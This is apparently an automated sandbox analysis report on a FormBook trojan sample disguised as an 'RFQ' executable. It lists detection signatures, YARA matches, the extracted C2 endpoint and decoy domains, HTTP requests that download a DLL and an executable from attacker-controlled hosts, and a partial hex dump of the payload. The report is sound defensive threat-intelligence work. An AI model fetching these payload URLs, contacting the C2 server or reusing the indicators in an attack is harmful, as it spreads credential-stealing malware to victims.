Windows Analysis Report
RFQ- 7075-T6.exe

Overview

General Information

Sample Name: RFQ- 7075-T6.exe
Analysis ID: 680627
MD5: d9761200032232025041ea4e1f7d0ae2
SHA1: bbebd24b01671f232d6e8552fd0b6ff43f22a2f6
SHA256: d5880984d7995779a57c6d76f84fa336ab7346560689ea406205544fe0f038c1
Tags: exeformbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: RFQ- 7075-T6.exe Virustotal: Detection: 21% Perma Link
Source: RFQ- 7075-T6.exe ReversingLabs: Detection: 14%
Yara detected FormBook
Source: Yara match File source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Antivirus / Scanner detection for submitted sample
Source: RFQ- 7075-T6.exe Avira: detected
Antivirus detection for URL or domain
Source: http://109.206.241.81/htdocs/qWDXb.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://109.206.241.81/htdocs/qWDXb.exe Virustotal: Detection: 15% Perma Link
Machine Learning detection for sample
Source: RFQ- 7075-T6.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.lafuriaroja.team/jn86/"], "decoy": ["yzeym.top", "bettymassage.co.uk", "zvzac.com", "eventscomparison.xyz", "ybzgh.com", "3618shop.com", "sosoicey.com", "sundancerenewable.com", "whorephotos.com", "zamawiamy.online", "idmtoucan.site", "home-visites.com", "maxtesler.website", "terilio.net", "aaemp.com", "linksy.site", "hairurge.com", "lizzo.ltd", "ukmcqc.co.uk", "coolerzap.net", "minifini.com", "rainjewel.com", "picassoai.art", "qwry.store", "gstwarehousesolutions.com", "fexlueg.xyz", "residentiallaw.uk", "corelinks.app", "suaratkbm.com", "juliettjaya.xyz", "suggestiontherapy.com", "chocolatemacaroon.com", "axionmotion.net", "gurpreet.world", "watersportsale.space", "babyinbalance.com", "alcacersurveyors.com", "jerseycity.construction", "jav-stars.com", "xn--micrsoft-q4a.com", "9966181.xyz", "batesmotel.xyz", "liquidationsteals.com", "guveniliradresim5.site", "onlycars.app", "156293.sbs", "fithealthcode.net", "bin-pro.com", "vacation2me.net", "ofertalbox.com", "tesla3.website", "saradaram.com", "forttownfinancial.net", "aguide2floridakeys.com", "asd461.xyz", "nihan.world", "vife.solutions", "aspotfy.com", "muttleycrue.net", "qvai-p8.xyz", "bestastroraghuram.com", "thefsdcollective.xyz", "flowerstudio.info", "clearwaterbeachdiet.store"]}
Uses 32bit PE files
Source: RFQ- 7075-T6.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: RFQ- 7075-T6.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\user\Desktop\RealProxyFlagsBadSignature.pdb source: RFQ- 7075-T6.exe, 00000000.00000002.237468256.0000000004B90000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: c:\Users\User\AppData\Local\Temp\Microsoft.CodeAnalysis.Hosting.Server.Features.pdb source: RFQ- 7075-T6.exe
Source: Binary string: C:\Users\user\Desktop\RealProxyFlagsBadSignature.pdbd source: RFQ- 7075-T6.exe, 00000000.00000002.237468256.0000000004B90000.00000004.08000000.00040000.00000000.sdmp

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.lafuriaroja.team/jn86/
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSignature.dll HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /htdocs/qWDXb.exe HTTP/1.1Host: 109.206.241.81Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 109.206.241.81 109.206.241.81
Source: Joe Sandbox View IP Address: 162.159.135.233 162.159.135.233
Source: Joe Sandbox View IP Address: 162.159.135.233 162.159.135.233
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 08 Aug 2022 20:21:09 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Last-Modified: Mon, 08 Aug 2022 17:34:39 GMTETag: "2e400-5e5be3af3ad6a"Accept-Ranges: bytesContent-Length: 189440Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 8b c8 83 c0 3c 8b 00 03 c1 83 c0 28 03 08 ff e1 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ab fc 08 ea ef 9d 66 b9 ef 9d 66 b9 ef 9d 66 b9 f4 00 cd b9 a9 9d 66 b9 f4 00 f8 b9 ec 9d 66 b9 f4 00 fb b9 ee 9d 66 b9 52 69 63 68 ef 9d 66 b9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 01 00 cb 17 11 4a 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d2 02 00 00 00 00 00 00 00 00 00 60 f0 01 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 02 00 00 02 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 d0 02 00 00 10 00 00 00 d2 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: unknown TCP traffic detected without corresponding DNS query: 109.206.241.81
Source: RFQ- 7075-T6.exe, 00000000.00000002.232356146.00000000025F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://109.206.241.81/htdocs/qWDXb.exe
Source: RFQ- 7075-T6.exe, 00000000.00000002.232496959.0000000002637000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://109.206.241.814
Source: RFQ- 7075-T6.exe, 00000000.00000002.232356146.00000000025F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RFQ- 7075-T6.exe, 00000000.00000002.232356146.00000000025F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com
Source: RFQ- 7075-T6.exe, 00000000.00000002.232356146.00000000025F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSign
Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSignature.dll HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /htdocs/qWDXb.exe HTTP/1.1Host: 109.206.241.81Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49739 version: TLS 1.2

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: dump.pcap, type: PCAP Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: dump.pcap, type: PCAP Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: RFQ- 7075-T6.exe PID: 3388, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: RFQ- 7075-T6.exe PID: 5432, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Uses 32bit PE files
Source: RFQ- 7075-T6.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: dump.pcap, type: PCAP Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: dump.pcap, type: PCAP Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: RFQ- 7075-T6.exe PID: 3388, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: RFQ- 7075-T6.exe PID: 5432, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
One or more processes crash
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 172
Detected potential crypto function
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Code function: 0_2_023C48A0 0_2_023C48A0
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Code function: 0_2_023C5E58 0_2_023C5E58
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Code function: 0_2_023C4891 0_2_023C4891
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Code function: 0_2_023C5E48 0_2_023C5E48
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Code function: 0_2_023C0EE0 0_2_023C0EE0
Sample file is different than original file name gathered from version info
Source: RFQ- 7075-T6.exe, 00000000.00000000.224033234.0000000000212000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameMicrosoft.CodeAnalysis.Hosting.Server.Features.exe4 vs RFQ- 7075-T6.exe
Source: RFQ- 7075-T6.exe, 00000000.00000002.237468256.0000000004B90000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameRealProxyFlagsBadSignature.dllX vs RFQ- 7075-T6.exe
Source: RFQ- 7075-T6.exe Binary or memory string: OriginalFilenameMicrosoft.CodeAnalysis.Hosting.Server.Features.exe4 vs RFQ- 7075-T6.exe
Source: RFQ- 7075-T6.exe Virustotal: Detection: 21%
Source: RFQ- 7075-T6.exe ReversingLabs: Detection: 14%
Source: RFQ- 7075-T6.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\RFQ- 7075-T6.exe "C:\Users\user\Desktop\RFQ- 7075-T6.exe"
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process created: C:\Users\user\Desktop\RFQ- 7075-T6.exe C:\Users\user\Desktop\RFQ- 7075-T6.exe
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 172
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Process created: C:\Users\user\Desktop\RFQ- 7075-T6.exe C:\Users\user\Desktop\RFQ- 7075-T6.exe Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ- 7075-T6.exe.log Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER277B.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@4/5@1/3
Source: RFQ- 7075-T6.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5432
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: RFQ- 7075-T6.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: RFQ- 7075-T6.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: RFQ- 7075-T6.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\user\Desktop\RealProxyFlagsBadSignature.pdb source: RFQ- 7075-T6.exe, 00000000.00000002.237468256.0000000004B90000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: c:\Users\User\AppData\Local\Temp\Microsoft.CodeAnalysis.Hosting.Server.Features.pdb source: RFQ- 7075-T6.exe
